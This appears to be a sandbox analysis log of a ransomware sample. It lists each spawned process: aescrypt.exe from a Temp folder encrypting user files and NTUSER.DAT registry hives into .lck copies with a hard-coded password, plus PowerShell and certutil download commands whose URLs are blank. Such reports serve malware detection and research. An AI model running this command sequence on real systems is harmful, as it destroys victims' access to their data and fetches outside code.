- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UnprotectRevoke.xps.lck" "UnprotectRevoke.xps"
    3⤵
    PID:5448
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceResize.ini.lck" "TraceResize.ini"
    3⤵
    PID:5464
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PingLock.vdx.lck" "PingLock.vdx"
    3⤵
    PID:5484
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ClearCompress.ppsm.lck" "ClearCompress.ppsm"
    3⤵
    PID:5500
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditProtect.jfif.lck" "EditProtect.jfif"
    3⤵
    PID:5528
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RequestSave.xltm.lck" "RequestSave.xltm"
    3⤵
    PID:5544
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupInvoke.tiff.lck" "BackupInvoke.tiff"
    3⤵
    PID:5560
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishAdd.sql.lck" "PublishAdd.sql"
    3⤵
    PID:5576
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameFind.M2V.lck" "RenameFind.M2V"
    3⤵
    PID:5592
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResolveEnable.docm.lck" "ResolveEnable.docm"
    3⤵
    PID:5608
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DisconnectWait.dll.lck" "DisconnectWait.dll"
    3⤵
    PID:5624
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeShow.7z.lck" "OptimizeShow.7z"
    3⤵
    PID:5640
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupMount.mpeg2.lck" "BackupMount.mpeg2"
    3⤵
    PID:5656
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GrantTest.cab.lck" "GrantTest.cab"
    3⤵
    PID:5672
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishDismount.tif.lck" "PublishDismount.tif"
    3⤵
    PID:5688
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResolveTest.lnk.lck" "ResolveTest.lnk"
    3⤵
    PID:5704
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ConvertShow.ppsm.lck" "ConvertShow.ppsm"
    3⤵
    PID:5720
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AddReset.dib.lck" "AddReset.dib"
    3⤵
    PID:5736
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MeasureWatch.shtml.lck" "MeasureWatch.shtml"
    3⤵
    PID:5752
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeUnpublish.TS.lck" "ResumeUnpublish.TS"
    3⤵
    PID:5768
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CompareReceive.txt.lck" "CompareReceive.txt"
    3⤵
    PID:5784
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EnableMeasure.lnk.lck" "EnableMeasure.lnk"
    3⤵
    PID:5800
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MergeExport.3gp.lck" "MergeExport.3gp"
    3⤵
    PID:5816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:5832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5948
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:6052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6092
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:6104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:6116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3232
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:5216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5304
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:5300
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ntuser.ini.lck" "ntuser.ini"
    3⤵
    PID:5320
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf"
    3⤵
    PID:5332
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"
    3⤵
    PID:5348
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms"
    3⤵
    PID:5372
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms"
    3⤵
    PID:5396
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NTUSER.DAT.lck" "NTUSER.DAT"
    3⤵
    PID:5408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:5436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5452
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4176
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5492
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5524
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5536
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5552
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5584
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5612
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:4676
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5636
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5680
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5696
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5716
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5728
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5756
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5812
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5820
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5836
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:4940
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5908
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:4700
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4756
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5888
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5876
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5856
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5892
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5912
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5928
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6008
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:1908
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5968
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5984
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5964
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5976
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:6004
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6020
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6088
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:6072
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:6068
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:6052
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:6092
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:6124
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:3236
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2052
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5168
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5132
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5140
